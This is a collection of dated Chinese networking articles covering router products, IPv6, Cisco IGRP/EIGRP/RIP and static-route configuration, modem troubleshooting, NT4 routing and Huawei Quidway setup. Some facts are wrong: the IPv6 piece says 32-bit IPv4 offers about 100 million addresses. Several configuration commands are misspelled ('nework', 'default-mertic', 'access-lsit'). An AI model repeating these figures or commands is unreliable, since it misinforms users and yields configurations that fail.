    (5)多协议支持。DI-1162支持PPP、MultiLink-PPP、SLIP及HDLC等通信协议。在IP Routing协议方面，它支持RIPv1、RIPv2以及静态路由协议。在IP Multicast协议方面，它支持DVMRP、IGMP协议。

    名称：DI-1162路由器

    供应商：D-Link

    功能：局域网上Internet、远程访问、局域网互联

    适用范围：中小企业

    特点：经济、小巧、适用

返回


IPv6技术素描

《一键清理系统垃圾》

IPv6技术素描

    互联网用户迅猛增多，提供地址的IPv4已经暴露出不足，为此IPv6应运而生。那么，它解决了什么问题？其潜力有多大？还有哪些问题要解决？

    IP地址面临枯竭

    IP协议IPv4产生于1974年，它提供了32位的IP地址。随着互联网强劲的发展势头，IPv4已经难以满足需要，它面临着以下三个主要问题：

    1.地址资源行将枯竭：IPv4提供的IP地址位数是32位，也即1亿个左右的地址。实际使用中，还要去除网络地址、广播地址、划分子网的开销、路由器地址、保留地址等等，最后有效的地址数目比可用的地址总数还要低。随着连接到Internet上的主机数目的迅速增加，有预测表明，所有IPv4地址将在2005～2010年间分配完毕。

    2.路由表越来越大：由于IPv4采用与网络拓扑结构无关的形式来分配地址，所以随着连入网络数目增加，路由器数目飞速增加，相应地，决定数据传输路由的路由表也就不断加大。庞大的路由表不仅增加了路由器的工作量，而且降低了Internet服务的稳定性。

    3.地址分配不便：IPv4是采用手工配置的方法来给用户分配地址，这不仅增加了管理费用，而且无法为那些需要IP移动性的用户提供更好服务。

    IPv6：穷极想象力

    与IPV4相比较，IPV6较好的解决了上面提到的众多问题。具体如下：

    1.IPv6将现有的IP地址长度扩大到128位。使地址数量大大增加。形象地说，对于地球的每平方米都将有超过1000个IPv6。这将极大地满足那些伴随着网络智能设备的出现而对地址增长的需求，例如个人数据助理(PDA)、移动电话(Mobile Phone)、家庭网络接入设备(HAN)等。

    2.主机自动配置IP地址和网络参数。IPv6继承了IPv4的DHCP自动配置服务。主机从DHCP服务器租借IP地址并获得有关的配置信息（如缺省网关、DNS服务器等），由此达到自动设置主机IP地址的目的。

    3.IPv6提供更好的服务质量(QoS)。IPv6除了可以有效的解决互联网网络地址的危机外，而且在提升互联网网络性能方面有了很大的提高。在IPv6中提供了对QoS的支持。在IPv6分组的头部中定义了两个重要参数：业务类别字段和流标示字段。业务类别字段将IP分组的优先级分为16个等级。对于那些需要特殊QoS的业务，可在IP数据包中设置相应的优先级，路由器根据IP包的优先级来分别对这些数据进行不同的处理。数据流标志位用于定义任意一个传输的数据流，以便网络中所有的节点能对这一数据进行识别，并作特殊的处理。

    4.为了加强Internet的安全性，防止诸如企业或机构网络遭到攻击、机密数据被窃取等不幸事件的发生。Ipv6中包含了一套用于保护IP通信的IP安全协议（IPSec）。IPSec是IPv6的一个组成部分，也是IPv4的一个可选扩展协议。IPv6对安全机制的增强可以简化安全虚拟专用网（VPN）的实现。

    5.IPv6支持组播功能，组播是一种可将信息传递给所有已登记了欲接收该消息的主机的功能，此功能可同时传递数据给大量的用户，传递过程只会占有一些公共或专用带宽开销而不会浪费带宽在整个网络里广播。IPv6还包含了一些限制组播消息传递范围的一些特性，这样，组播消息可以被局限在一个特定的位置，区域，公司或其它约定范围，从而减少了带宽的使用并可提供安全性。 　　6.利用必选的RSVP功能，用户可在沿源点到目的地的路由器上预留带宽，这使得提供具有服务质量的图像和其它实时业务成为可能。

    7.IPv6将支持包长可达四兆字节的分组，这将使得大分组的传送更容易，并可确保IPv6能够在任意的传输媒体上达到对可用带宽的最隹利用。

    IPv6商机何在

    自从1995年IPv6的主要规格被确定以后，IPv6便成为事实上下一代IP协议的规范。1996年2月美国新罕布什尔大学的IOL（相互操作性实验室）第一个将IPv6用于通信软件并进行了相互连接实验。1997年，以验证IPv6为主要目的的实验网络6bone发展为连接29个国家的大规模网络。IPv6作为新一代的网络互联协议，其先进性和灵活性正在得到越来越多人的认可。

    我们确信IPv6将会用来连接比计算机和网络更多的东西，IPv6将使得像掌上型个人数据助理（PDA）、嵌入了网络元件的移动电话、商务通等许多其它设备接入网络成为可能，它也能使从家里的电钣锅到高尔夫球场上的洒水车这样广泛的设备和装置接入网络。

    IPv6的普及将标志着网络时代的彻底到来。在不远的将来，当汽车由于交通堵塞而停在路途中时，我们将能够利用车载计算机通过口述来修改日程安排以便让家人和同事知道我们被堵在哪儿了，还可以控制打开里的暖气和电灯，同时在这辆车上还可以运行诊断程序和下载结果，这样当我们到达指定的商店时，我们需要的东西早已准备好了。事实上，无论在家里、在办公室还是在娱乐场所，我们曾使用的交互设备都可接入到因特网上，商机无限且前景惊人，IPv6将使所有的这些成为可能。

    转换到IPv6还要解决什么

    IPv6协议与IPv4协议不兼容的事实是其走向市场的一个难点。目前IETF正在确定两种方法来完成这种转换处理：隧道技术和双协议栈技术。

    隧道技术是一种选择，两个IPv6的站点可以在IPv4骨干网上通过隧道通信（或反之），但它无法让一个IPv4站点与另一个IPv6站点通信。而如果一个站点具有IPv4/IPv6的双协议栈，它就即可以与IPv4站点通信也可以与IPv6站点通信。但是这样做显然需要巨大的投资，特别是对于规模较大的网络，不同供应商的产品协议栈的互通协调也是有必要的，同时，上层协议也可能需要替换。

    虽然IPv6设计的基本目标是易于从IPv4转换到IPv6和能于IPv4共存，但把今天数十亿台基于IPv4的系统转换到IPv6上将面临巨大挑战。但是，Ipv6内置的兼容性特点将使得这种努力会容易一些，并且像IPv6上的分组隧道和IPv4上的分组隧道技术，以及协议翻译网关都将使得这项工作较为容易。

    许多机构组织都正在开发IPv6驱动软件，一些网络供应商也宣布了他们对IPV在网络应用和通信软件产品中的广泛支持。

    对协议系统的修改可能会给现有的应用带来很大的影响，因此必须小心谨慎地实施以使风险最小，因此，在现有的应用中把IPv4转换到IPv6或在一个新的应用中实现IPv6，都需要相当的专业技术从而确保协议的平滑转换和准确无误地实现。可以采取逐步升级和最小限度升级等方法逐渐逐步，以减少风险。

    因此IPv6正在发展许多网络厂商也正在组织力量开发IPv4转换到IPv6的产品，无论如何，IPv4终将被IPv6所替代，这是历史发展的必然规律。

返回


IP路由协议的配置实例

《一键清理系统垃圾》

IP路由协议的配置实例

Cisco IOS支持的协议有:

内部网关协议(它是在一个自治系统内部交换路由信息的路由协议)----- IGRP, EIGRP, OSPF, RIP 和 IS-IS等等.

外部网关协议(它是为连接两个或多个自治系统的路由协议)----- BGP 和 EGP等等.
选择路由协议的原则

选择一个路由协议是一个非常复杂的工作.当选择路由协议,参考以下几点:

网络的大小和复杂性
支持可变长掩码(VLSM).Enhanced IGRP,IS-IS,OSPF和静态路由支持可变长掩码
网络流量大小
安全需要
网络延迟特性
下面就分别介绍各种路由协议的特点和配置.

配置IGRP

内部网关路由协议(Interior Gateway Routing Protocol---- IGRP)是一个动态的,长跨度的路由协议,它是Cisco公司八十年代中期设计实现的,在一个自治系统内具有高跨度,适合复杂网络的特点.

Cisco's IGRP的实现

IGRP的网络延迟,带宽,可靠性和负载都是可由用户配置决定的.

IGRP广播三种类型的路由:内部的,系统的和外部的.如图所示.内部的路由是在一台路由器的端口上连接子网的路由.如果一台路由器连接的网络是非子网的,IGRP就不广播内部路由.

图 1 :内部,系统和外部路由

系统路由是一个自治系统内的路由.Cisco IOS 软件从直连的网络接口上获得系统路由,并把它提供给其它的支持IGRP协议的路由器或访问服务器.系统路由不包括子网信息.

外部路由是自治系统之间的路由.

IGRP的路由交换

默认的,一个运行IGRP路由协议的路由器每90秒广播一次路由信息.如果在270秒内未收到某路由器的回应,它则认为目前该路由器不可到达;若在630秒后仍未有应答,则把有关它的路由信息从路由表中删掉.

IGRP的配置

指定路由器IGRP协议:

功能 命令
激活IGRP路由,进入路由配置模式 router igrp process number
加入网络直连的网段 nework network-number

请参阅"Configure IGRP Example",更加详细的资料请看 Cisco CD 或 Cisco的主页.

配置Enhanced IGRP

Enhanced IGRP是Cisco公司开发的IGRP的增强的版本.它使用与IGRP相同的路由算法,但它在许多方面对IGRP作了较大的改进.

Cisco's Enhanced IGRP的实现

Cisco's Enhanced IGRP提供了以下特性:

自动重新分配-----IP IGRP路由可以自动的重新分配到EIGRP中,IP EIGRP也可以自动的重新分配到IGRP中.如果愿意,也可以关掉重新分配.
可扩展的网络-----对于IP RIP,你的网络最大只有15个hops,而当使用EIGRP时,最大可以有224个hops.
触发的路由表-----EIGRP并不象IGRP那样经过一定的时间间隔后交换路由信息的,而是只有当路由表有变化时才把路由表广播出去的,叫做触发式的(triggered).
支持可变长掩码(VLSM)
配置Enhanced IGRP

指定EIGRP路由协议:

功能 命令
激活EIGRP路由,进入路由配置模式 router eigrp process number
加入网络直连的网段 nework network-number

更加详细的资料请看 Cisco CD 或 Cisco的主页.

IGRP到EIGRP的迁移

在同一个自治系统的IGRP和EIGRP是自动能够重新分配的,而在不同两个自治系统之间,作如下配置:

功能 命令
在路由配置模式下,指定路由重新分配 redistribute protocol [option]
在所有的非IGRP环境下使用相同的metric值 default-metric bandwidth delay reliability loading mtu

请参阅"IGRP and EIGRP Redistribution Example",更加详细的资料请看 Cisco CD 或 Cisco的主页.

配置RIP

路由信息协议(Routing Information Protocol ---RIP)是一个相对比较老的,但仍被广泛使用的路由协议.

RIP广播一个UDP数据包更换路由信息,每个路由器间隔30秒更换一次路由信息,在180秒内未收到某路由器的回应,它则认为目前该路由器不可到达;若在270秒后仍未有应答,则把有关它的路由信息从路由表中删掉.

RIP的配置

指定IP RIP路由协议:

功能 命令
激活RIP路由,进入路由配置模式 router rip
加入网络直连的网段 nework network-number

RIP到IGRP,EIGRP的迁移

功能 命令
在路由配置模式下,指定路由重新分配 redistribute protocol [option]
在所有的非IGRP环境下使用相同的metric值 default-metric number

请参阅"RIP and EIGRP Redistribution Example",更加详细的资料请看 Cisco CD 或 Cisco的主页.

配置静态路由

在某些环境下,我们需要尽量小的路由交换和其它一些特殊环境下会用到静态路由.

功能 命令
在Global配置模式下,指定网关静态路由 ip route network [mask] address [distance]
在Global配置模式下,用串口指定静态路由 ip route network [mask] interface [distance]

请参阅"Static Routing Redistribution Configure Example".

IP路由协议实例配置

Configure IGRP Example
IGRP and EIGRP Redistribution Example
RIP and EIGRP Redistribution Example
Static Routing Redistribution Configure Example
Route Filtering Example
Redistribution Filtering
Configure IGRP Example

假设RouterA连接到130.108.0.0和10.0.0.0这两个直连网段上.

RouterA#config terminal (在"#"提示符下)
RouterA(config)#router igrp 15 (进入配置模式)
RouterA(config-router)#network 130.108.0.0 (进入路由配置子模式)
RouterA(config-router)#network 10.0.0.0

IGRP and EIGRP Redistribution Example

在AS 200和AS 100两个自治系统内,分别跑EIGRP和IGRP协议,要想互相通信:

Configuration for RouterA

router eigrp 200
network 201.222.5.0
redistribute igrp 100
default-mertic 56 2000 255 1 1500

router igrp 100
network 131.108.0.0
redistribute eigrp 200
default-metric 56 2000 255 1 1500

RIP and EIGRP Redistribution Example

Configuration for RouterA

router rip
network 201.222.5.0
redistribute eigrp 100
default-mertic 3

router eigrp 100
network 131.108.0.0
redistribute rip
default-metric 56 2000 255 1 1500

Static Routing Redistribution Configure Example

Configuration for RouterA

ip route 131.108.1.0 255.255.255.0 131.108.2.1
!
router eigrp 1
network 192.31.7.0
default-metric 10000 100 255 1 1500
redistribute static
distribute-list 3 out static
!
access-list 3 permit 131.108.0.0 0.0.255.255

Route Filtering Example

在路由器B上,过滤掉由10.0.0.0发送过来的路由信息,那么在201.222.5.0这个网段上是不能与10.0.0.0这个网通信的.换句话说,在201.222.5.0一端隐藏了10.0.0.0这个网.

Configuration for Router

router eigrp 1
network 131.108.0.0
network 201.222.5.0
distribute-list 7 out s0
!
access-list 7 permit 131.108.0.0 0.0.255.255
access-list 7 deny 10.0.0.0 0.255.255.255

Redistribution Filtering

效果同上,但是在两个不同的路由协议下的.

Configuration for Router

router rip
network 201.222.5.0
redistribute eigrp 100
default-mertic 3
!
router eigrp 100
network 131.108.0.0
redistribute rip
default-metric 56 2000 255 1 1500
distribute-list 7 out rip
!
access-list 7 deny 10.0.0.0 0.255.255.255
access-lsit 7 permit 0.0.0.0 255.255.255.255

返回


IP网络路由技术

《一键清理系统垃圾》

IP网络路由技术

    近几年来，基于TCP/IP协议的Internet已逐步发展成为当今世界上规模最大、拥有用户和资源最多的一个超大型计算机网络，TCP/IP协议也因此成为事实上的工业标准。IP网络正逐步成为当代乃至未来计算机网络的主流。

    IP网络是由通过路由设备互连起来的IP子网构成的，这些路由设备负责在IP子网间寻找路由，并将IP分组转发到下一个IP子网。

    IP地址

    IP地址是IP网络中数据传输的依据，它标识了IP网络中的一个连接，一台主机可以有多个IP地址。IP分组中的IP地址在网络传输中是保持不变的。

    1.基本地址格式

    现在的IP网络使用32位地址，以点分十进制表示，如172.16.0.0。地址格式为：IP地址=网络地址＋主机地址或 IP地址=主机地址＋子网地址＋主机地址。

    网络地址是由Internet权力机构（InterNIC）统一分配的，目的是为了保证网络地址的全球唯一性。主机地址是由各个网络的系统管理员分配。因此，网络地址的唯一性与网络内主机地址的唯一性确保了IP地址的全球唯一性。

    2.保留地址的分配

    根据用途和安全性级别的不同，IP地址还可以大致分为两类：公共地址和私有地址。公用地址在Internet中使用，可以在Internet中随意访问。私有地址只能在内部网络中使用，只有通过代理服务器才能与Internet通信。

    一个机构或网络要连入Internet，必须申请公用IP地址。但是考虑到网络安全和内部实验等特殊情况，在IP地址中专门保留了三个区域作为私有地址，其地址范围如下：
    10.0.0.0/8：10.0.0.0～10.255.255.255
    172.16.0.0/12：172.16.0.0～172.31.255.255
    192.168.0.0/16：192.168.0.0～192.168.255.255

    使用保留地址的网络只能在内部进行通信，而不能与其他网络互连。因为本网络中的保留地址同样也可能被其他网络使用，如果进行网络互连，那么寻找路由时就会因为地址的不唯一而出现问题。但是这些使用保留地址的网络可以通过将本网络内的保留地址翻译转换成公共地址的方式实现与外部网络的互连。这也是保证网络安全的重要方法之一。

    无类域间路由（CIDR）

    由于每年连入Internet的主机数成倍增长，因此Internet面临B类地址匮乏、路由表爆炸和整个地址耗尽等危机。无类域间路由（CIDR）就是为解决这些问题而开发的一种直接的解决方案，它使Internet得到足够的时间来等待新一代IP协议的产生。

    按CIDR策略，可采用申请几个C类地址取代申请一个单独的B类地址的方式来解决B类地址的匮乏问题。所分配的C类地址不是随机的，而是连续的，它们的最高位相同，即具有相同的前缀，因此路由表就只需用一个表项来表示一组网络地址，这种方法称为“路由表聚类”。

    另外，除了“路由表聚类”措施外，还可以由每个ISP从InterNIC获得一段地址空间后，再将这些地址分配给用户。

    路由选择技术

    IP网络中的路由选择是由路由设备完成的。路由器通过执行一定的路由协议，为IP数据报寻找一条到达目的主机或网络的最佳路由，并转发该数据报，实现路由选择。

    1.路由协议

    路由协议分为两大类：

    路由选择协议（Routing Protocol）
    这类协议使用一定的路由算法找出到达目的主机或网络的最佳路径，如RIP（路由信息协议）等。

    路由传送协议（Routed Protocol）
    这类协议沿已选好的路径传送数据报，如通过IP协议能将物理连接转变成网络连接，实现网络层的主要功能——路由选择。

    2.直连路由与非直连路由

    IP协议是根据路由来转发数据的。路由器中的路由有两种：直连路由和非直连路由。

    路由器各网络接口所直连的网络之间使用直连路由进行通信。直连路由是在配置完路由器网络接口的IP地址后自动生成的，因此，如果没有对这些接口进行特殊的限制，这些接口所直连的网络之间就可以直接通信。

    由两个或多个路由器互连的网络之间的通信使用非直连路由。非直连路由是指人工配置的静态路由或通过运行动态路由协议而获得的动态路由。其中静态路由比动态路由具有更高的可操作性和安全性。

    IP网络已经逐渐成为现代网络的标准，用IP协议组建网络时，必须使用路由设备将各个IP子网互连起来，并且在IP子网间使用路由机制，通过IP网关互连形成层次性的网际网。

返回


Modem

《一键清理系统垃圾》

Modem

[color=Green]常见故障一：56K的Modem不能上到56K。这个问题可以从以下几方面考虑：[/color]
[color=Blue]1. 实际的56Kmodem最高速度只能达到53K左右，考虑各种影响，56Kmodem的速度一般在45-53K之间。 ;P
    2. 电话线路在很大程度上影响Modem的传输速度，如果电话线路质量不好、线路电压不稳，56K的Modem
就上不到56K；另外使用分机上网，也会影响上网速度。
    3. 未安装正确的驱动程序。
    4. 和ISP使用的协议不同，只有您的Modem和您的ISP协议相同时，Modem才会达到56K的标准。
    排除以上原因，您的56K Modem仍速度远远低于53K，这就是您的Modem硬件问题，可以考虑更换或送修
了。
[/color]
[color=Red]常见故障二：Modem经常掉线，产生掉线问题可能有以下几种原因： [/color]
[color=Blue]1. 电话线路质量不好；
    2. 若数据终端就绪(DTR)信号无效持续的时间超过Modem默认设置值，就会引起掉线；
    3. 如果您的电话具有"呼叫等待"这一程控电话新功能，每当有电话打进来，调制解调器就会受到干扰而
断开；
    4. 另外，Modem本身的质量以及不同Modem间的兼容性问题也是引起Modem掉线的一个普遍存在的原因。[/color]

[color=Red]常见故障三：Modem无拨号音 [/color]
[color=Blue]当在夜深人静的时候上网时，为了不使拨号音影响别人睡眠，可以通过适当的AT命令来改变：可以用ATM0设置Modem无拨号音，而ATM1设置Modem从拨号到连接时有拨号音。对于音量的选择您可以通过以下指令改变，ATL0(低音量)、ATL1(低音量)、ATL2(中音量)、ATL3(高音量)。
[/color]

[color=Red]常见故障四：传真速率达不到14400 [/color]
[color=Blue]Modem的最大传真速率是14400，而发传真时速率只有9600。这是因为大部分传真机的发送和接受速率都
是9600，只有使用速率是14400或是33600的传真机，Modem的传真速率才会达到14400。
[/color]

[color=Red]常见故障五：Modem无法拨号或连接 [/color]
[color=Blue]如果没有正确安装您的Modem，通信功能将无法正常工作。下列过程列出了验证Modem与Windows的通讯程序安装了不兼容的驱动程序文件，可能会导致COM端口和Modem工作不正常，所以应该首先检查是否加载了正确的Windows98文件。

    1. 检验现有的通讯文件
    (1) 将System目录中的COMM.DRV和SERIAL.VXD文件与Windows95软盘或光盘中的原版文件进行比较，检
查文件的大小和日期是否相同。
    (2) 确认在System.ini文件中有下列几行：[boot]Comm.drv=Comm.drv[386enh]device=*vcd
    (3) 在"控制面板"中运行"添加新硬件"向导，检测和安装Windows98驱动程序。注意：Windows98在
System.ini中不加载SERIAL.VXD驱动程序，而是使用注册命令来加载它。另外，在System.ini中也没有与
*VCD相关的文件。这些文件被内置于VMM32.VXD中。

    2. 检验调制解调器的配置
    在"控制面板"中，双击"调制解调器"图标。验证您的调制解调器的制造商和型号，运行"安装新调制解调
器"向导检测调制解调器并确认当前配置是否正确。如果您的调制解调器未出现在已安装的调制解调器列表
中，请单击"添加"，然后选择合适的调制解调器。如果制造商和类型不正确，并且在列表中没有您的设备制造商及类型，请试着用“通用调制解调器"中的"与Hayes兼容"选项，设置为调制解调器支持的最大波特率，并单击"确定"。在排除冲突列表中删除所有的调制解调器条目。

    3. 检查调制解调器是否处于可以使用状态
    在"控制面板"中双击"系统"图标，然后单击"设备管理"标签，在列表中选择您的调制解调器并单击"属
性"，确认是否选中"设备已存在，请使用"。

    4. 检查端口的正确性
    在"控制面板"中双击"调制解调器"图标，选择您的调制解调器，然后单击"属性"，在"通用"标签上，检验
列出的端口是否正确。如果不正确，请选择正确的端口，然后单击"确定"。

    5. 确认串口的I/O地址和IRQ设置是否正确
    在"控制面板"中双击"系统"图标，单击"设备管理"标签，再单击"端口"，选取一个端口，然后单击"属
性"，单击"资源"标签显示该端口的当前资源设置，请参阅调制解调器的手册以找到正确的设置，在"资源"对
话框中，检查"冲突设备列表"以查看调制解调器使用的资源是否与其它设备发生冲突，如果调制解调器与其它设备发生冲突，请单击"更改设置"，然后单击未产生资源冲突的配置。
    注意：如果COM1上有鼠标器或其它设备，请不要在COM3上使用调制解调器。通常COM1和COM3端口使用同
样的IRQ，并且在多数计算机上不能同时使用。COM2和COM4也有同样的问题。如果可能的话，请更改COM3和
COM4端口的IRQ设置，使它们不再冲突。另外，有一些显示卡的地址也和COM4端口冲突，如果发现冲突，请使用其它端口，或者更换您的图形适配器。

    6. 检验端口设置
    在"控制面板"上双击"调制解调器"图标，单击调制解调器，然后单击"属性"，在出现的菜单中单击"连
接"标签以便检查当前端口设置，例如波特率、数据位、停止位和校验。

    7. 检验调制解调器波特率
    在"控制面板"中双击"调制解调器"，选择一种调制解调器，然后单击"属性"，单击"通用"标签，然后将波
特率设置为正确速率。
    注意：如果您呼叫的主系统在原先设置的波特率下无法通讯，那么有时降低波特率可能会解决问题。


NT Server 4.0 做静态路由器

《一键清理系统垃圾》

NT Server 4.0 做静态路由器

----单位有两个LAN，现在都连在一台服务器上，运行NT4.0，内置两个网卡，一个网卡连一个网。有什么办法能让服务器充当路由，使一个网内的计算机能Ping到另一个网上.
---- 方法如下：

---- NT Server4.0 内置静态路由选择功能，将服务器配置成多宿主计算机(Multihome Computer)来充当路由器,不需要另加路由器，就可以解决LAN的互联问题。其原理是：当主机发现分组的目标地址不在本网段时，将将该分组发送到默认网关，这样由多宿主计算机将分组发送到另一个网段，完成网络的互联。特别地，在只有两个路由器的情况下，只需设置它的默认网关而不需要向路由表中添加路由选项.对于内部专用网这个功能相当实用，配置也很简单.

---- 在进行设置以前，请你确保服务器、两个LAN上各工作站的网卡驱动程序、TCP/IP协议、IP地址(服务器上两块网卡的IP地址，要与它们各自连接网段的网络地址匹配)、子网掩码已经设置正确。那么你已经具备了两个LAN互联的基本条件。现在只需进行一些必要的设置，就可以实现你所需要的功能。

---- 服务器上的设置：

---- 1、启动计算机，以Administrator身份登录；

---- 2、单击“开始”- >“设置”- >“控制面板”- >“网络”；

---- 3、在“网络”对话框中，单击“协议”- >“TCP/IP通信协议”- >“属性”；

---- 4、出现“MicroSoft TCP/IP 属性”对话框，单击“IP地址”选单，在“适配器”中选择和LAN1(你的两个LAN，且称其为LAN1、LAN2,与其对应的网卡称其为IC1、IC2，IC1、IC2上的IP地址称为IP1、IP2)相连的网卡IC1，单击此对话框底部的“默认网关”，设置成IP1，即和上面的“IP地址”相同，这样LAN1就设置完成；然后，在“适配器”中选择和LAN2连接的网卡IC2，再将此对话框下面的“默认网关”设置成IP2，与“IP地址”相同；

---- 5、在“MicroSoft TCP/IP属性”对话框选单中，单击“路由选择”；

---- 6、单击“启用IP转发”，确保其被选中；

---- 7、单击“确定”，重新启动计算机。

---- 经过这些步骤，就完成了多宿主计算机的设置。

---- 各个工作站的设置：

---- 1、启动计算机，以Administrator身份登录；

---- 2、单击“开始”- >“设置”- >“控制面板”- >“网络”；

---- 3、在“网络”对话框中，单击“协议”- >“TCP/IP”通信协议- >“属性”；

---- 4、出现“MicroSoft TCP/IP 属性”对话框，在“适配器”中选择该工作站对应的网卡。如果该工作站在LAN1上，则将对话框底部的“默认网关”设置为IP1(注意：不能和该工作站的IP地址相同)，如果在LAN2上，是将它设置为IP2。

---- 5、单击“确定”，重新启动计算机。

---- 在各个工作站上重复以上步骤完成所有工作站的设置(DOS工作和Windows95工作站的设置与此大同小异，请查阅有关资料)。到此，两个网络的互联工作就完成了。

返回


Quidway R2501路由器配置指南

《一键清理系统垃圾》

Quidway R2501路由器配置指南

    现在资源共享的要求越来越高，为此，迫切需要把单位内部的所有微机连入一个网内。为了把远离局本部的刘村变电所接入局域网，我们配备了Quidway R2501路由器，利用一点多址设备提供的2条64k数字通道，以128k速率把该变电所的微机连入局域网。现介绍一下Quidway R2501路由器的配置方法。

    Quidway R2501是华为公司推出的一款具有2个多协议同/异步串口、1个备份口的高性能路由器，2个同/异步串口可接高速同步线路，连接远程局域网和分支机构，也可以通过异步拨号方式实现局域网互连。根据需要我们在局本部和远端刘村各配一台Quidway R2501路由器，利用负载均衡技术通过2条64k数字通道实现128k速率连接，配置AUX口作为备份连接，一旦微波数字通道出故障，可以启动拨号实现备份功能。

    局本部的局域网地址为：10.138.184.0（子网掩码：255.255.255.0），路由器的局域网端口地址：10.138.184.21。远端局域网地址为：10.138.185.192（子网掩码：255.255.255.192），路由器的局域网端口地址：10.138.185.193。

    配置Quidway R2501路由器

    1．配置路由器的广域网接口，根据选择的广域网传输介质，配置接口的物理工作参数。对于拨号口，还需要配置 DDN参数，然后根据选择的广域网类型，选择接口封装的链路层协议以及相应的工作参数。 　　2．根据子网的划分，配置路由器各接口的IP地址或IPX网络号。

    3．配置接口间的转发路由，如果需要启用动态路由协议，还需配置相关动态路由协议的工作参数。

    4． 如果有特殊的安全要求，则需进行路由器的安全性配置。

    5． 如果有特殊的可靠性要求，则需进行路由器的可靠性配置。

    设置Quidway R2501有两种方法，一是通过Quidway R2501的配置端口利用微机或终端来配置，二是利用网络通过Telnet命令来配置，不过采用此方法，要求用户已经正确配置了路由器各接口的IP地址。相比较而言，第一种方法更具有通用性，其配置方法如下：

    用随机提供的配置口电缆把PC的串口1和Quidway R2501的Console口相连。用PC建一个超级终端：开始→程序→附件→通信→超级终端→用鼠标双击Hypertrm.exe文件→输入要建的超级终端名称并选择一个图标→选择“直接连接到串口1”选项→设置通信端口（设置终端通信参数：通信速率9600bps，8位数据位，1位停止位，无奇偶校验，无流控，终端类型VT100，二进制传输协议Xmodem/CRC）。

    如果路由器是第一次上电，自动执行Setup命令，以交互方式提示用户配置路由器最初启动所必须的参数，包括路由器主机名、特权用户口令、SNMP、IP、IPX、桥、各端口的IP地址等，具体设置方法如下：

    Enter host name [Quidway] （配置路由器名称）

    Enter enable password（配置特权用户口令）

    Configure SNMP Network Management? [yes] （配置网管）

    Community string：public

    Configure IP [yes] （配置IP）

    Configure IPX [no] （配置IPX）

    Configure Bridge [yes]（配置桥）

    Configure interface Ethernet0 （配置以太网口，逐步输入网络端口正确的IP地址和子网掩码）

    Configure IPX on this interface？[no] （配置IPX网络号）

    Configure bridge on this interface？[yes] （配置桥）

    Configure interface Serial？[no] （配置串口1）

    设置子网互联路由

    我们以局本部Quidway R2501路由器配置为例，说明怎样设置实现双方子网互联的路由（我们已在SETUP模式中设定了Quidway R2501路由器的主机名为Quidway）：

    enable，输入口令（进入特权模式）

    config（进入配置模式）

    Quidway（Config）#interface ethernet 0（进入以太网口配置模式）

    Quidway（Config-if-Ethernet0）#ip address 10.138.184.21 255.255.255.0（配置以太网口的IP 地址为10.138.184.21）

    Quidway（Config）#interface seria10（进入串口0配置模式）

    Quidway(Config-if-Serial0)#ip address 10.139.184.245 255.255.255.252(配置seria10的IP地址10.139.184.245。注：远端Quidway R2501路由器serial 0端口的IP地址为10.139.184.246 255.255.255.252）

    Quidway(Config)#interface serial1(进入串口1配置模式)

    Quidway(Config-if-Serial1)#ip address 10.139.184.249 255.255.255.252（配置serial1的IP地址10.139.184.249。注：远端Quidway R2501路由器serial 1端口的IP地址为10.139.184.250 255.255.255.252）

    Quidway(Config)#interface serial2（进入备份口配置模式）

    Quidway（Config-if-Serial2）#ip address 10.139.184.253 255.255.255.252（配置AUX的IP 地址10.139.184.253。注：远端Quidway R2501路由器AUX端口的IP地址为10.139.184.254 255.255.255.252）

    ip route 10.138.185.192 255.255.255.192 10.139.184.246

    ip route 10.138.185.192 255.255.255.192 10.139.184.250（配置2条静态路由。为了实现负载均衡，serial0和serial1的优先级相同） 　　ip route 10.138.185.192 255.255.255.192 10.139.184.254 preference 80（配置备份口的静态路由，优先级比主口低，为80）

    配置备份口的拨号

    Quidway(Config)#interface serial 2（进入备份口配置模式）

    Quidway（Config-if-Serial2）#encapsulation ppp（链路层封装协议配置为PPP）

    Quidway（Config-if-Serial2）#baudrate 19200（设置备份口的波特率）

    Quidway（Config-if-Serial2）#modem（允许MODEM呼出和呼入）

    Quidway（Config-if-Serial2）#dialer in-band（使能DDR）

    Quidway（Config-if-Serial2）#dialer-group1（指明接口使用dialer-list1）

    dialer map ip 10.139.184.253（刘村的IP地址）2884271（要拨的电话号码）（配置IP地址和电话号码的映射关系）

    配置修改结束后，一定要执行write命令，否则，所作的修改在系统重启后会全部丢失。

    远端的Quidway R2501路由器也进行类似的配置，配置完毕，就可投入使用了。

    注意：局本部局域网工作站的默认网关应设为10.138.184.21，刘村局域网工作站的默认网关应设为10.138.185.193。

返回


Quidway R2630系列路由器

《一键清理系统垃圾》

Quidway R2630系列路由器

    作为一个大中型企业总希望网络运作灵活扩容，以低成本创造高效益。深圳华为技术有限公司生产的 Quidway R2630系列路由器实现了企业这一梦想，R2630路由器拥有卓越的模块化设计，通过高密度插槽，实现了灵活组网，随机扩容。R2630系列路由器出色之处还体现在卓越的数据、语音一体化集成技术，优越的安全性、稳定性、处理能力及远程管理能力更是体现了它的不凡之处。语音化功能可以让你在网络上享受电话般的语音，同时也降低了网络运行成本和企业话费。作为模块化多功能路由器，它可作为中小企业的中心路由器或分支路由器，包括两个型号：R2630和R2631。R2630提供1个10/100Mbps以太网口和3个模块插槽，R2631提供2个10/100Mbps以太网口和3个模块插槽。两者采用的模块化体系结构，可以根据用户组网需要显配接口模块，提供灵活多变的解决方案，并能适应逐渐成熟的新技术和新的业务与应用。

    Quidway R2630系列路由其具有以下功能：

    一. 语音支持

    Quidway R2630系列路由器支持两种模拟语音接口模块，包括4路和2路模拟语音接口模块，每种语音接口模块支持下列接口类型：2AT，2AL，2E&M。2AT用于连接普通交换机接口，2AL用于连接模拟电话接口，2E&M用于连接PBX E&M接口。支持G.711、G.723、G.729等多种编码算法。支持H.323协议栈。支持GK接口。 可以和多家VOIP设备厂商互通，包括Cisco、AudioCodec、VocalTec、Microsoft Netmeeting等。

    二、Quidway R2630系列路由器接口采用模块化设计，两款路由都支持8种接口模，R2630系列路由器接口模块核插槽的位置无关，为用户提供可扩展和高度灵活的应用方案，可满足用户的不同应用环境，并可通过增加或替换接口模块适应扩容需求和用户业务的发展，保护用户的原有投资。Quidway R2630系列路由器提供丰富的业务接口，包括对语音接口的支持，支持国内所有中低速业务接口，可以满足DDN、帧中继、X.25、PSTN、ISDN、异步专线等各种组网需求。

    三、性能价格比更高：

